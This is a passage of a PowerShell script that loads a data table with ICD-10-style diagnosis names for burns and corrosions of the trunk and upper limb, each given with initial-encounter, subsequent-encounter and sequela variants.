$DiagnosisList.Rows.Add("Burn of second degree of other site of trunk","Burn of second degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of trunk, unspecified site","Burn of third degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of trunk, unspecified site","Burn of third degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of trunk, unspecified site","Burn of third degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chest wall","Burn of third degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chest wall","Burn of third degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of chest wall","Burn of third degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of abdominal wall","Burn of third degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of abdominal wall","Burn of third degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of abdominal wall","Burn of third degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of upper back","Burn of third degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of upper back","Burn of third degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of upper back","Burn of third degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lower back","Burn of third degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lower back","Burn of third degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of lower back","Burn of third degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of buttock","Burn of third degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of buttock","Burn of third degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of buttock","Burn of third degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of male genital region","Burn of third degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of male genital region","Burn of third degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of male genital region","Burn of third degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of female genital region","Burn of third degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of female genital region","Burn of third degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of female genital region","Burn of third degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of other site of trunk","Burn of third degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of other site of trunk","Burn of third degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of other site of trunk","Burn of third degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of trunk, unspecified site","Corrosion of unspecified degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of trunk, unspecified site","Corrosion of unspecified degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of trunk, unspecified site","Corrosion of unspecified degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chest wall","Corrosion of unspecified degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chest wall","Corrosion of unspecified degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of chest wall","Corrosion of unspecified degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of abdominal wall","Corrosion of unspecified degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of abdominal wall","Corrosion of unspecified degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of abdominal wall","Corrosion of unspecified degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of upper back","Corrosion of unspecified degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of upper back","Corrosion of unspecified degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of upper back","Corrosion of unspecified degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lower back","Corrosion of unspecified degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lower back","Corrosion of unspecified degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of lower back","Corrosion of unspecified degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of buttock","Corrosion of unspecified degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of buttock","Corrosion of unspecified degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of buttock","Corrosion of unspecified degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of male genital region","Corrosion of unspecified degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of male genital region","Corrosion of unspecified degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of male genital region","Corrosion of unspecified degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of female genital region","Corrosion of unspecified degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of female genital region","Corrosion of unspecified degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of female genital region","Corrosion of unspecified degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of other site of trunk","Corrosion of unspecified degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of other site of trunk","Corrosion of unspecified degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of other site of trunk","Corrosion of unspecified degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of trunk, unspecified site","Corrosion of first degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of trunk, unspecified site","Corrosion of first degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of trunk, unspecified site","Corrosion of first degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chest wall","Corrosion of first degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chest wall","Corrosion of first degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of chest wall","Corrosion of first degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of abdominal wall","Corrosion of first degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of abdominal wall","Corrosion of first degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of abdominal wall","Corrosion of first degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of upper back","Corrosion of first degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of upper back","Corrosion of first degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of upper back","Corrosion of first degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lower back","Corrosion of first degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lower back","Corrosion of first degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of lower back","Corrosion of first degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of buttock","Corrosion of first degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of buttock","Corrosion of first degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of buttock","Corrosion of first degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of male genital region","Corrosion of first degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of male genital region","Corrosion of first degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of male genital region","Corrosion of first degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of female genital region","Corrosion of first degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of female genital region","Corrosion of first degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of female genital region","Corrosion of first degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of other site of trunk","Corrosion of first degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of other site of trunk","Corrosion of first degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of other site of trunk","Corrosion of first degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of trunk, unspecified site","Corrosion of second degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of trunk, unspecified site","Corrosion of second degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of trunk, unspecified site","Corrosion of second degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chest wall","Corrosion of second degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chest wall","Corrosion of second degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of chest wall","Corrosion of second degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of abdominal wall","Corrosion of second degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of abdominal wall","Corrosion of second degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of abdominal wall","Corrosion of second degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of upper back","Corrosion of second degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of upper back","Corrosion of second degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of upper back","Corrosion of second degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lower back","Corrosion of second degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lower back","Corrosion of second degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of lower back","Corrosion of second degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of buttock","Corrosion of second degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of buttock","Corrosion of second degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of buttock","Corrosion of second degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of male genital region","Corrosion of second degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of male genital region","Corrosion of second degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of male genital region","Corrosion of second degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of female genital region","Corrosion of second degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of female genital region","Corrosion of second degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of female genital region","Corrosion of second degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of other site of trunk","Corrosion of second degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of other site of trunk","Corrosion of second degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of other site of trunk","Corrosion of second degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of trunk, unspecified site","Corrosion of third degree of trunk, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of trunk, unspecified site","Corrosion of third degree of trunk, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of trunk, unspecified site","Corrosion of third degree of trunk, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chest wall","Corrosion of third degree of chest wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chest wall","Corrosion of third degree of chest wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of chest wall","Corrosion of third degree of chest wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of abdominal wall","Corrosion of third degree of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of abdominal wall","Corrosion of third degree of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of abdominal wall","Corrosion of third degree of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of upper back","Corrosion of third degree of upper back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of upper back","Corrosion of third degree of upper back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of upper back","Corrosion of third degree of upper back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lower back","Corrosion of third degree of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lower back","Corrosion of third degree of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of lower back","Corrosion of third degree of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of buttock","Corrosion of third degree of buttock, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of buttock","Corrosion of third degree of buttock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of buttock","Corrosion of third degree of buttock, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of male genital region","Corrosion of third degree of male genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of male genital region","Corrosion of third degree of male genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of male genital region","Corrosion of third degree of male genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of female genital region","Corrosion of third degree of female genital region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of female genital region","Corrosion of third degree of female genital region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of female genital region","Corrosion of third degree of female genital region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of other site of trunk","Corrosion of third degree of other site of trunk, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of other site of trunk","Corrosion of third degree of other site of trunk, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of other site of trunk","Corrosion of third degree of other site of trunk, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right forearm","Burn of unspecified degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right forearm","Burn of unspecified degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right forearm","Burn of unspecified degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left forearm","Burn of unspecified degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left forearm","Burn of unspecified degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left forearm","Burn of unspecified degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified forearm","Burn of unspecified degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified forearm","Burn of unspecified degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified forearm","Burn of unspecified degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right elbow","Burn of unspecified degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right elbow","Burn of unspecified degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right elbow","Burn of unspecified degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left elbow","Burn of unspecified degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left elbow","Burn of unspecified degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left elbow","Burn of unspecified degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified elbow","Burn of unspecified degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified elbow","Burn of unspecified degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified elbow","Burn of unspecified degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right upper arm","Burn of unspecified degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right upper arm","Burn of unspecified degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right upper arm","Burn of unspecified degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left upper arm","Burn of unspecified degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left upper arm","Burn of unspecified degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left upper arm","Burn of unspecified degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified upper arm","Burn of unspecified degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified upper arm","Burn of unspecified degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified upper arm","Burn of unspecified degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right axilla","Burn of unspecified degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right axilla","Burn of unspecified degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right axilla","Burn of unspecified degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left axilla","Burn of unspecified degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left axilla","Burn of unspecified degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left axilla","Burn of unspecified degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified axilla","Burn of unspecified degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified axilla","Burn of unspecified degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified axilla","Burn of unspecified degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right shoulder","Burn of unspecified degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right shoulder","Burn of unspecified degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right shoulder","Burn of unspecified degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left shoulder","Burn of unspecified degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left shoulder","Burn of unspecified degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left shoulder","Burn of unspecified degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified shoulder","Burn of unspecified degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified shoulder","Burn of unspecified degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified shoulder","Burn of unspecified degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right scapular region","Burn of unspecified degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right scapular region","Burn of unspecified degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right scapular region","Burn of unspecified degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left scapular region","Burn of unspecified degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left scapular region","Burn of unspecified degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left scapular region","Burn of unspecified degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified scapular region","Burn of unspecified degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified scapular region","Burn of unspecified degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified scapular region","Burn of unspecified degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of first degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right forearm","Burn of first degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right forearm","Burn of first degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right forearm","Burn of first degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left forearm","Burn of first degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left forearm","Burn of first degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left forearm","Burn of first degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified forearm","Burn of first degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified forearm","Burn of first degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified forearm","Burn of first degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right elbow","Burn of first degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right elbow","Burn of first degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right elbow","Burn of first degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left elbow","Burn of first degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left elbow","Burn of first degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left elbow","Burn of first degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified elbow","Burn of first degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified elbow","Burn of first degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified elbow","Burn of first degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right upper arm","Burn of first degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right upper arm","Burn of first degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right upper arm","Burn of first degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left upper arm","Burn of first degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left upper arm","Burn of first degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left upper arm","Burn of first degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified upper arm","Burn of first degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified upper arm","Burn of first degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified upper arm","Burn of first degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right axilla","Burn of first degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right axilla","Burn of first degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right axilla","Burn of first degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left axilla","Burn of first degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left axilla","Burn of first degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left axilla","Burn of first degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified axilla","Burn of first degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified axilla","Burn of first degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified axilla","Burn of first degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right shoulder","Burn of first degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right shoulder","Burn of first degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right shoulder","Burn of first degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left shoulder","Burn of first degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left shoulder","Burn of first degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left shoulder","Burn of first degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified shoulder","Burn of first degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified shoulder","Burn of first degree of unspecified shoulder, 